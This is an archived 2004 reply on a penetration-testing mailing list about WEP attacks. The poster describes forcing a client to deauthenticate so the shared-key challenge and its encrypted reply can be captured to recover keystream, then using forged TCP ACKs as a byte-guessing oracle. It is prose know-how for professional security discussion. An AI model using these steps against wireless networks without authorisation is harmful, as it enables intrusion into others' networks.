Penetration Testing mailing list archives
Re: WEP attacks based on IV Collisions
From: leonardo <billtorvalds1 () yahoo it>
Date: Wed, 2 Jun 2004 21:50:41 +0200
* Wednesday 02 June 2004, alle 08:09, Jeremy Junginger scrive:
But before I can even think about the key, I need to figure out how to identify these encrypted DHCP? Anyone know?
if you have enough time to arrange this attack, you just have to wait for a new machine to authenticate (or, force any machine to deauthenticate and waut for it to authenicate again). Authentication in WEP works quite surprisingly like this: AP sends a challengetext in clear (128 bit), supplicant answers with the same challengetext crypted with the wep key, AP checks correctness of the encryption and authenticates the client. So if you listen to an authentication you see 128 bit passing in plaintext and crypted and you can get those 128 bit of keystream.
1) Generate an 8 byte (n-3) message that generates a predictable response (8 byte ICMP packet? What shall we use here?)
you don't really need a predictable packet, if you send a ACK TCP message on a closed port of any host you'll get a RST if your forged packet was correctly checksummed, otherwise nothing. so if you get a response you got the right byte. ciao, leonardo. -- 0C5F B8DE 3136 1506 96D0 1806 7674 D513 A66E 7854
Current thread:
- RE: WEP attacks based on IV Collisions Jeremy Junginger (Jun 02)
- Re: WEP attacks based on IV Collisions leonardo (Jun 02)
- <Possible follow-ups>
- RE: WEP attacks based on IV Collisions pen-test (Jun 04)
- RE: WEP attacks based on IV Collisions pen-test (Jun 04)
- Re: WEP attacks based on IV Collisions leonardo (Jun 07)
- Re: WEP attacks based on IV Collisions Andrew A. Vladimirov (Jun 11)
- Re: WEP attacks based on IV Collisions leonardo (Jun 07)